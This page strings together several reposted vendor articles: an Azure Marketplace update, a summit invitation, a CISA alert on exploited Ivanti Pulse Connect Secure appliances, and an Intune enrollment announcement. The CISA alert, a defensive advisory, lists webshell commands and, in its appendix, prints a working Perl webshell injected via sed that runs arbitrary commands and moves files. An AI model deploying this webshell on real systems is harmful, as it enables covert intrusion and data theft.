This article is contributed. See the original author and article here.
We continue to expand the Azure Marketplace ecosystem. For this volume, 54 new offers successfully met the onboarding criteria and went live. See details of the new offers below: | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
This article is contributed. See the original author and article here.
Microsoft is committed to helping public sector leaders through their intergovernmental agency data sharing, cybersecurity, and collaboration initiatives. Register here for our Microsoft State and Local Government Collaboration and Cybersecurity Summit on April 27th. This free virtual event will deliver key insights, practical guidance, and direct conversations with public sector leaders and Microsoft stakeholders. Join us to learn more about:
Our virtual event provides sessions tailored specifically for state and local organizations, as well as live interactive conversations with industry peers and Microsoft experts to address real world issues. Also gain access to content presented during the Federal and Civilian agency sessions delivered on April 20, 2021.
Learn from others. Share common strategies. Register today at https://aka.ms/MicrosoftinGov.
This article is contributed. See the original author and article here.
This article is contributed. See the original author and article here.
The Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Ivanti Integrity Checker Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.
Ivanti has provided a mitigation and is developing a patch. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Ivanti Integrity Checker Tool, update to the latest software version, and investigate for malicious activity.
On March 31, 2021, Ivanti released an Integrity Checker Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states:
We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ).
The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality:
DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907
Licenseserverproto.cgiLicenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6
Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a
HTTP requestscompcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3
ID argumentLogin.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5
Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a
HTTP requestsOther files were found with additional functionality:
libdsplibs.so MD5: 416488b6c8a9bdb9c0cb592e36f44677
Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active:
Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.
The threat actor then ran the commands listed in table 1 via the webshell.
Table 1: Commands run via webshell
| Time | Command |
|---|---|
| 2021-01-19T07:46:05.000+0000 | pwd |
| 2021-01-19T07:46:24.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T08:10:13.000+0000 | cat%20/home/webserver/htdocs/dana-na/l[redacted] |
| 2021-01-19T08:14:18.000+0000 | See Appendix. |
| 2021-01-19T08:15:11.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T08:15:49.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T09:03:05.000+0000 | cat%20/home/webserver/htdocs/dana-na/[redacted] |
| 2021-01-19T09:04:47.000+0000 | $mount |
| 2021-01-19T09:05:13.000+0000 | /bin/mount%20-o%20remount,rw%20/dev/root%20/ |
| 2021-01-19T09:07:10.000+0000 | $mount |
The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity.
Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.
CISA strongly urges organizations using Pulse Secure devices to immediately:
If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:
In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 – Customer FAQ: PCS Security Integrity Tool Enhancements, which includes:
After preservation, you can remediate your Pulse Connect Secure appliance by:
CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Ivanti Integrity Checker Tool again after remediation has been taken place.
CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at
CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/.
Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20$n=$_[0];my%20$rs;for%20(my%20$i=0;$i%3C$n;$i++){my%20$n1=int(rand(256));$rs.=chr($n1);}return%20$rs;}sub%20a{my%20$st=$_[0];my%20$k=r([redacted]);my%20$en%20=%20RC4(%20$k.$ph,%20$st);return%20encode_base64($k.$en);}sub%20b{my%20$s=%20decode_base64($_[0]);%20my%20$l=length($s);my%20$k=%20substr($s,0,[redacted]);my%20$en=substr($s,[redacted],$l-[redacted]);my%20$de%20=%20RC4(%20$k.$ph,%20$en%20);return%20$de;}sub%20c{my%20$fi=CGI::param(%27img%27);my%20$FN=b($fi);my%20$fd;print%20%22Content-type:%20application/x-downloadn%22;open(*FILE,%20%22%3C$FN%22%20);while(%3CFILE%3E){$fd=$fd.$_;}close(*FILE);print%20%22Content-Disposition:%20attachment;%20filename=tmpnn%22;print%20a($fd);}sub%20d{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20text/htmlnn%22;my%20$fi%20=%20CGI::param(%27cert%27);$fi=b($fi);my%20$pa=CGI::param(%27md5%27);$pa=b($pa);open%20(*outfile,%20%22%3E$pa%22);print%20outfile%20$fi;close%20(*outfile);}sub%20e{print%20%22Cache-Control:%20no-cachen%22;print%20%22Content-type:%20image/gifnn%22;my%20$na=CGI::param(%27name%27);$na=b($na);my%20$rt;if%20(!$na%20or%20$na%20eq%20%22cd%22)%20{$rt=%22Error%20404%22;}else%20{my%20$ot=%22/tmp/1%22;system(%22$na%20%3E/tmp/1%202%3E&1%22);open(*cmd_result,%22%3C$ot%22);while(%3Ccmd_result%3E){$rt=$rt.$_;}close(*cmd_result);unlink%20$ot}%20%20print%20a($rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20%22%22){e();}else{%20%20%20&main();}}if%20($ENV{%27REQUEST_METHOD%27}%20eq%20%22POST%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX
Initial version: April 20, 2021
This product is provided subject to this Notification and this Privacy & Use policy.
This article is contributed. See the original author and article here.
We’re excited to announce support for a new authentication method for Automated Device Enrollment (ADE) which is Setup Assistant with Modern Authentication. This new authentication method will be available for iOS/iPadOS devices running 13.0 and later and for macOS devices running 10.15 and later, in public preview in Microsoft Endpoint Manager.
This new authentication method for automated device enrollment will allow your organization to require authentication with Azure AD (required) and multi-factor authentication (optional) in order to successfully enroll the device. The end user will be required to authenticate with their Azure AD credentials during Setup Assistant, with an additional Azure AD login to the Company Portal after enrollment. If the admin has a Conditional Access policy that requires multi-factor authentication (at enrollment only, or enrollment and Company Portal login) then MFA will be required, otherwise it is optional. This will benefit organizations that are looking to require authentication in the out-of-box experience (OOBE) during enrollment in the Setup Assistant screens prior to users accessing the home screen.
Enrollment is completed once the user lands on the home screen, and users can freely use the device for resources not protected by Conditional Access. User affinity is established when users complete the additional Azure AD login into the Company Portal app on the device. That additional Azure AD login to the Company Portal app completes Azure AD registration, which establishes user affinity between the device user and Intune. Once user device affinity is established, the device will show up in the given user’s device list in the Azure AD portal since device identity association is established upon a successful login into the Company Portal.
When creating an Automated Device Enrollment profile, you’ll be able to choose a new authentication method: Setup Assistant with modern authentication (preview). This method provides all the security from authenticating with the Company Portal but avoids the issue of leaving end users stuck on a device they can’t use while the Company Portal installs on the device. With this new authentication method, the user has to authenticate using Azure AD credentials during the setup assistant screens. This will require an additional Azure AD login post-enrollment in in the Company Portal app to gain access to corporate resources protected by Conditional Access. The correct Company Portal version will automatically be sent down as a required app to the device for iOS/iPadOS, which we recommend choosing a VPP token for the enrollment profile. Otherwise, it will be sent down if the end user completes setting up their Apple ID during the Setup Assistant screens. For macOS, here are the options to get the Company Portal on the device – Add the Company Portal for macOS app – Microsoft Intune | Microsoft Docs.
If the admin configures a Conditional Access policy to require multi-factor authentication (MFA), then the end user will need a second device to complete MFA. Multi-factor authentication is optional based on the configuration of the MFA Azure AD settings.
A new improvement we’ve made to our onboarding experience helps guide end users to complete that second Azure AD authentication by automatically redirecting to the iOS/iPadOS Company Portal when the user attempts to access corporate data.
If users open any managed iOS/iPadOS applications that are protected by Conditional Access and they haven’t completed the additional Azure AD login into the iOS/iPadOS Company Portal, they will be redirected to the iOS/iPadOS Company Portal from those other apps as part of this new change. This way, users will know exactly where to go to get access to resources protected by Conditional Access and will be guided to complete that last step.
Here is what it will look like if the end user tries to open any app protected by Conditional Access before authenticating in the Company Portal –
Conditional Access block screen
System prompt that opens the iOS/iPadOS Company Portal
Learn how to configure the new Setup Assistant with Modern Authentication for iOS/iPadOS and macOS in the Microsoft Endpoint Manager admin center by reading Enroll iOS/iPadOS devices by using ADE – Microsoft Intune | Microsoft Docs and Enroll macOS devices – Apple Business Manager or Apple School Manager | Microsoft Docs. Within the MEM admin center, you can control where a user is prompted for multi-factor authentication using different cloud apps when creating a Conditional Access policy. The following screenshot provides an example of the prompt locations:
MFA Prompt Locations for Microsoft Intune and Microsoft Intune Enrolment
For both iOS/iPadOS and macOS, user device affinity is established with the additional Azure AD login to the Company Portal app as mentioned above. That is also when device compliance is assessed, and the device shows up as compliant in the Microsoft Endpoint Manager admin center. If you would like to keep the device as enrolled with Intune but without user device affinity, that is also supported.
Once enrollment is completed during Setup Assistant, the end user lands on the home screen and can freely use the device. If there are no resources protected by Conditional Access and if Azure AD registration is not required, then this authentication method can be used to fully enroll the device as a user-less device. Note the following device behavior if you choose this automated device enrollment flow without guiding end users to login to the Company Portal post enrollment:
Let us know if you have any questions by commenting on this post or reaching out to @IntuneSuppTeam on Twitter.
Recent Comments